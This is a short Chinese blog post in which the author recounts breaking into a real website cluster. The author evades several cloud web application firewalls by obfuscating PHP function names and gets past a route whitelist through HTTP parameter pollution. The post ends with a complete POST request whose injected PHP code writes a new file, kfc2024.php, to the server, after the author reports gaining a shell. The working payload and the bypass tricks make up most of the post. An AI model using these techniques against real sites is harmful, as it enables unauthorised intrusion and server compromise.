已授權轉載,有興趣可以關注下公眾號
某集約化站群去年留的漏洞,今年用的時候發現被攔截了。吐槽下,這是徹底瘋狂了嗎,百度雲 waf、華為雲 waf、安全狗都弄一起是什麼鬼啊.....
waf bypass
比較簡單,過濾了 eval 編碼下就行。
路由白名單限制 bypass
隨意請求訪問發現存在路由限制,只允許訪問指定路徑。
但是不可能所有路徑都寫死,比如搜索功能需要接收用戶輸入內容,抓包確認搜索接口可以正常使用且不會觸發路由白名單限制。
因此猜測可以利用參數污染繞過限制,例如:
#插入同名參數
/index.php?name=bob&name=rose
#後端實際可能接收
name=rose
getshell 後查看代碼,確認該接口匹配的是任意內容。
最終 payload
POST /index.php?c=api&m=essearchlist&s=mmyzj&c=Toup&m=Zj_Post HTTP/2
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
id='-("fil"."e"._."pu"."t"._."contents")("./kfc2024.php",("base"."64"._."decode")('a2ZjX3ZfbWVfNTA='),FILE_APPEND)-'